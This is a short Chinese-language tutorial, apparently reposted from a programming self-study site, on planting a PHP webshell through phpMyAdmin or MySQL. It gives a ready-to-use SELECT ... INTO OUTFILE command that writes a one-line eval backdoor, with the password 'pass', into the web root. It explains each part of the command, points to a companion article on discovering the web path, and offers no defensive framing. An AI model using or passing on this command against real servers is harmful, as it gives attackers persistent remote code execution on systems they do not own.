如果得知数据库账号密码,可通过mysql导出一句话到网站目录.
导出shell代码是:select "<?php @eval($_POST['pass']);?>" into outfile 'C:/APMServ5.2.6/www/htdocs/123.php';
代码讲解:select后面双引号即为一句话代码,outfile 单引号即为web的目录。导出成功后即在网站根目录生成123.php,密码pass.
如果不知道web目录的,可以通过看我的另一篇文章《 phpmyadmin爆路径方法 》
下面我演示一遍
执行命令。
执行成功后.
如果执行失败,说明没有权限
查看更多关于phpmyadmin导出shell mysql导出一句话 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13718